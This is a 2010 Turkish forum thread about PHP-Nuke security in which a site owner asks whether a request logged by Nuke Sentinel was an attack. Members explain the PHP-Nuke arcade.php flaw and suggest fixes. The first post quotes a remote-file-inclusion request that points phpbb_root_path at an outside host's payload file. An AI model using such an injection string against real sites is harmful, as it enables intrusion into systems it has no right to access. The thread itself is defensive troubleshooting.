Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 302
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4653 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(7832 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3263 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(9542 okuma, 10 yanıt)
 Nuke Sentinel..
(4295 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(4824 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3385 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(9852 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9122 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5089 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(40337 okuma, 45 yanıt)
 Bu bir saldırmı..
(8001 okuma, 7 yanıt)
 siteme virüs girmis..
(8123 okuma, 6 yanıt)
 Sitedekileri atmak..
(5096 okuma, 2 yanıt)
 Kötü botları engellemek...
(10974 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7032 okuma, 5 yanıt)
 index atılamayan site yap..
(6911 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5211 okuma, 2 yanıt)
 js trojandownloader.agent..
(5646 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7336 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(4843 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(5823 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(13564 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(26072 okuma, 25 yanıt)
 hacklendim mi?..
(5887 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(75182 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4371 okuma, 1 yanıt)
 Site neden Google i banla..
(4112 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6111 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7138 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7178 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(9624 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(6906 okuma, 5 yanıt)
 forum için kod yazma yasa..
(4833 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4615 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5168 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4678 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3407 okuma, 0 yanıt)
 Protector' deki Host İs..
(3423 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7432 okuma, 7 yanıt)
 index dosyasının chmod k..
(3993 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3570 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(7718 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4412 okuma, 1 yanıt)
 Nuke Güvenlik..
(156993 okuma, 257 yanıt)
 bütün index lere iframe e..
(18366 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5611 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(23824 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(18628 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3712 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - 2 dakika içinde 5 farklı bölgedeki İP no banlandı,
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 

2 dakika içinde 5 farklı bölgedeki İP no banlandı,

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
Sergen
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 31, 2008
Mesajlar: 298
MesajTarih: 2010-02-20, 12:41:17    Mesaj konusu: 2 dakika içinde 5 farklı bölgedeki İP no banlandı, Alıntıyla Cevap Gönder
Sitemdeki Nuke Sentinel 2 dk içinde 5 farklı İp noyu banladı. İp nolara baktığımda hepsi farklı yabancı ülkeye ait
124.193.89.** : ÇİN
88.191.43.** : FRANSA
94.23.115.** : KİNGDOM
203.84.249.** : KORE
219.117.205.** JAPONYA
Sorgulama yapımında ise şu link bulunuyor.
www.siteismi. com/ modules.php?name=forums/arcade.php? phpbb_root_path=http://www. sinhvienqb.com/news/idbun1. txt
(linklerin arasını ayırdım)
Bu bir çeşit saldırımı oluyor?
Bilen arakadaşlardan yorum bekliyorum.

Forumlar dolaşırken şöyle bir şey buldum
Alıntı:
dün sitemde arcade.php üzerinden admin şifremi ele gecirmişler expolit çalıştırırak eğer sizinde powernuke kurulu siteniz varsa şu değişiklikleri mutalaka yapın:
Arcade.php , functions.php , functions_arcade.php de aşagıdaki kodu bulun;
Kod:
include($phpbb_root_pathve bu kodun basındakı " $ " harfini silin..


Yukarıdaki yazılanlarla alaksı var sanırım
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor
Tarih: 2024-04-18, 16:55:05    Mesaj konusu: Forum Arası Reklamlar

Başa dön
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan
MesajTarih: 2010-02-20, 13:42:55    Mesaj konusu: Alıntıyla Cevap Gönder
Tehlikeli birşey yapmaya çalışmamışlar. Bi nevi test yapmışlar.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Sergen
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 31, 2008
Mesajlar: 298
MesajTarih: 2010-02-20, 14:37:06    Mesaj konusu: Alıntıyla Cevap Gönder
Forumlarda Arcade oyunlarını zaten kullanmıyoruz. FTP den arcade.php dosyalarını silsek iyi olmaz mı?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan
MesajTarih: 2010-02-20, 18:18:44    Mesaj konusu: Alıntıyla Cevap Gönder
zararı olmaz silmenizin ama silmeye de gerek yok. arcade.php dosyasında <?php satırının bir altına $phpbb_root_path=''; eklemeniz bile yeterli
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bankocu
Editör
Editör





Kayıt: Jun 02, 2003
Mesajlar: 1842
Konum: Istanbul
MesajTarih: 2010-02-20, 19:16:26    Mesaj konusu: Alıntıyla Cevap Gönder
Aslında phpbb_root_path da aynı nuke prefixi gibi değiştirilmesi gereken sabit tanımlardan biri.
Nasıl ki bu tür standart saldırılar için nuke_ şeklindeki prefixi değiştirmek bir önlemse aynı şekilde phpbb_root_path da değiştirilmesi gereken bir şey.

Ama değiştirilmesi biraz daha zor olduğu için genelde kimse ilgilenmiyor.
Benim sitelerde phpbb_root_path yok örneğin. (Veritabanı içinde de, source dosyaları içinde de yok)
Yani yukarıdaki sorgu bu şekilde işlev göremeyecekti zaten.

Bir scriptin standart değerlerini ne kadar çok kullanırsanız, eline taş alan küçük çocukların o kadar kolay hedefi olursunuz.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan
MesajTarih: 2010-02-20, 23:06:55    Mesaj konusu: Alıntıyla Cevap Gönder
değişkenin değil, mantalitenin değiştirilmesi gerekiyor. register globals mantığı ile çalışmak güvenli birşey değil. $_GET['phpbb_root_path'] ile $phpbb_root_path aynı olmamalı. Tabi register global off olsa bu seferde mainfile import ediyor değişkenleri, dolayısıylada böyle riskli şeyler çıkıyor ortaya. O yüzden her değişkene bir ön tanım vermek şart oluyor. Bazı bloklarda bile benzer sorunlar var ama echo fonksiyonu kullanıldığından sayfa çıktısı ile anlık oynanabiliyo.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular
Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok VıdeolaR Orta Blogonunda Farklı Taray... cuneytsonmez Php Nuke Blocklar 3 2010-04-07, 23:02:49 Son Mesajı Görüntüle
Yeni mesaj yok tema genisliyor farklı tarayıcı ile ... cuneytsonmez Php Nuke Tema Paylaşımları 11 2010-03-28, 20:25:13 Son Mesajı Görüntüle
Yeni mesaj yok Wp- son dakika haberleri baska site y... kurtulus Wordpress Eklentileri 1 2010-03-25, 18:16:36 Son Mesajı Görüntüle
Yeni mesaj yok PHP-Nuke Haber V.1 'de en üstte kayan... hsengun1905 Php Nuke Sorunlarınız 11 2009-12-19, 02:42:33 Son Mesajı Görüntüle
Yeni mesaj yok Eklenti : Her block'a farklı görünüm ... efendymurat Php Nuke Blocklar 0 2009-10-29, 20:00:09 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright